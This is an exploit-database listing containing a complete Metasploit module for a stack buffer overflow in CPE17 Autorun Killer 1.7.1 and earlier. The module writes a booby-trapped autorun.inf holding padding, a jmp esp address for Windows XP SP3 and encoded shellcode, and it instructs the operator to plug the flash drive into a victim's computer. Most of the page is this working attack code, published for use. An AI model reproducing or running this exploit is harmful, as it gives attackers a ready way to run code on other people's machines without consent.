CPE17 Autorun Killer <= 1.7.1 Stack Buffer Overflow Exploit



EKU-ID: 2030 CVE: OSVDB-ID:
Author: Xelenonz Published: 2012-04-28 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


#
# CPE17 Autorun Killer <= 1.7.1 Stack Buffer Overflow exploit
# by Xelenonz

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

      include Msf::Exploit::FILEFORMAT

      def initialize(info = {})
                super(update_info(info,
                        'Name'           => 'CPE17 Autorun Killer <= 1.7.1 Stack Buffer Overflow exploit',
                        'Description'    => %q{
                                        readfile function is vulnerable it can be overflow 
                                             },
                        'Author'         => [ 'Xelenonz' ],
                        'Version'        => '0.1',
                       
                        'Payload'        =>
                                {
                                        'EncoderType' => Msf::Encoder::Type::AlphanumMixed,
          'EncoderOptions' => {'BufferRegister'=>'ECX'},
                                },
   'DefaultOptions' =>
                    {
                       'DisablePayloadHandler' => 'true',
                    },
                        'Platform'       => 'windows',

                        'Targets'        =>
                                [
                                        [
                                         'Windows XP SP3',
                                            {  'Ret' => 0x775a676f,
                                             'Offset' => 500
                                            }
                                       ],
                                     
                                ],
                        'DefaultTarget' => 0,

                        'Privileged'     => false
                        ))

                        register_options(
                        [
                         OptString.new('FILENAME',   [ true, 'The file name.',  'autorun.inf']),
                        ], self.class)
       end

       def exploit
          print_status("Encoding Payload ...")
          enc = framework.encoders.create("x86/alpha_mixed")
    enc.datastore.import_options_from_hash( {'BufferRegister'=>'ESP'} )
    hunter = enc.encode(payload.encoded, nil, nil, platform)
    buffer = ""
          buffer << "A"*target['Offset'] # padding offset
          buffer << [target.ret].pack('V') # jmp esp
          buffer << hunter # shellcode
          print_status("Creating '#{datastore['FILENAME']}' file ...")
          file_create(buffer)
          print_status("Plug flashdrive to victim's computer")
          handler
         
       end
end